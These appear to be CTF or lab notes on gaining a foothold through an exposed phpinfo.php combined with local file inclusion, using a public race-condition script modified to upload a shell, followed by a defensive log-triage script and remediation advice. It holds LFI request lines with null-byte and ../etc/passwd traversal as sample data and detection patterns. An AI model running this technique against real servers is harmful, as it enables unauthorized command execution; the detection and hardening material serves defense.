5 foothold_2 phpinfo.php + LFI

# phpinfo.php shows file_uploads: ON
# if phpinfo.php is exposed and LFI is possible, it's possible to create a race condition and get command execution

Using https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/phpinfolfi.py

# modifications (one more below)
1. in place of payload (don't modify the full variable), put the entire shell.php
2. LFIREQ="""GET /browse.php?file=%s%%00 HTTP/1.1\r

$ python phpinfolfi.py localhost 80 100
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... Traceback (most recent call last):
  File "phpinfolfi.py", line 371, in <module>
    main()
  File "phpinfolfi.py", line 331, in main
    offset = getOffset(host, port, reqphp)
  File "phpinfolfi.py", line 290, in getOffset
    raise ValueError("No php tmp_name in phpinfo output")
ValueError: No php tmp_name in phpinfo output

# added redirection via burp to debug the error and
# checked the response and saw [tmp_name] =&gt.
# in the script it's [tmp_name] =>

3. modify => to =&gt

# worked.
# remove burp proxy


$ python phpinfolfi.py 10.10.10.84 80 200
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 112940
Spawning worker pool (200)...
 1000 /  1000
:(
Shuttin' down...

# should get shell
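Defender-side view of the same technique, as an added example (not part of the original notes and not from the PayloadsAllTheThings script): a small log-triage script that flags the traces this procedure leaves in a web server's access log. The three things that stand out are requests for the exposed phpinfo.php, `file=` parameters carrying a null byte or path traversal, and the burst of hundreds of requests per second from one client that the race-condition worker pool produces. The log lines, IPs and the `/browse.php` path are constructed sample data; the thresholds are assumptions to tune per environment.

```python
"""Flag phpinfo()+LFI race-condition traces in Apache/nginx combined-format logs.

Added example for these notes; the sample log lines, IP addresses and the
burst threshold below are constructed / assumed, not taken from a real host.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample log (combined log format, sizes/IPs made up).
# 10.0.0.9 fetches phpinfo.php, probes the LFI with traversal and a null
# byte, then hammers phpinfo.php six times in one second (race attempt).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "GET /phpinfo.php HTTP/1.1" 200 40122
10.0.0.9 - - [10/Mar/2024:12:00:03 +0000] "GET /browse.php?file=../../../../etc/passwd HTTP/1.1" 200 1804
10.0.0.9 - - [10/Mar/2024:12:00:04 +0000] "GET /browse.php?file=index.php%00 HTTP/1.1" 200 88
10.0.0.5 - - [10/Mar/2024:12:00:05 +0000] "GET /browse.php?file=about.html HTTP/1.1" 200 2210
10.0.0.9 - - [10/Mar/2024:12:00:10 +0000] "POST /phpinfo.php HTTP/1.1" 200 40122
10.0.0.9 - - [10/Mar/2024:12:00:10 +0000] "POST /phpinfo.php HTTP/1.1" 200 40122
10.0.0.9 - - [10/Mar/2024:12:00:10 +0000] "POST /phpinfo.php HTTP/1.1" 200 40122
10.0.0.9 - - [10/Mar/2024:12:00:10 +0000] "POST /phpinfo.php HTTP/1.1" 200 40122
10.0.0.9 - - [10/Mar/2024:12:00:10 +0000] "POST /phpinfo.php HTTP/1.1" 200 40122
10.0.0.9 - - [10/Mar/2024:12:00:10 +0000] "POST /phpinfo.php HTTP/1.1" 200 40122
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def request_indicators(raw_path):
    """Name the suspicious properties of a request path (decoded once)."""
    decoded = unquote(raw_path)
    found = []
    if "phpinfo.php" in decoded.lower():
        found.append("phpinfo_access")      # diagnostics page reachable
    if "\x00" in decoded or "%00" in raw_path:
        found.append("null_byte")           # null-byte truncation attempt
    if "../" in decoded or "..\\" in decoded:
        found.append("traversal")           # classic LFI probe
    return found


def has_burst(timestamps, threshold, window_seconds):
    """True if `threshold` or more events fall inside any `window_seconds` span."""
    ts = sorted(timestamps)
    span = timedelta(seconds=window_seconds)
    j = 0
    for i in range(len(ts)):
        while j < len(ts) and ts[j] - ts[i] <= span:
            j += 1
        if j - i >= threshold:
            return True
    return False


def analyze(log_text, burst_threshold=5, window_seconds=1.0):
    """Return per-request alerts plus the clients whose request rate looks like a race loop."""
    alerts = []
    per_ip_times = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        per_ip_times[rec["ip"]].append(rec["ts"])
        inds = request_indicators(rec["path"])
        if inds:
            alerts.append({"ip": rec["ip"], "path": rec["path"], "indicators": inds})
    burst_ips = sorted(
        ip for ip, t in per_ip_times.items() if has_burst(t, burst_threshold, window_seconds)
    )
    return {"alerts": alerts, "burst_ips": burst_ips}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for a in result["alerts"]:
        print(f"{a['ip']:<10} {','.join(a['indicators']):<24} {a['path']}")
    print("burst clients:", result["burst_ips"])
```

The burst check is the part worth keeping even when the path patterns are tuned away: the script in these notes fires its whole worker pool against phpinfo.php, so a single source producing hundreds of hits on one PHP page in a second is a far stronger signal than any individual request. The remediation side is simpler still: remove phpinfo.php from production, and set `file_uploads = Off` in php.ini wherever uploads are not needed, which takes away the temporary file the race depends on.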
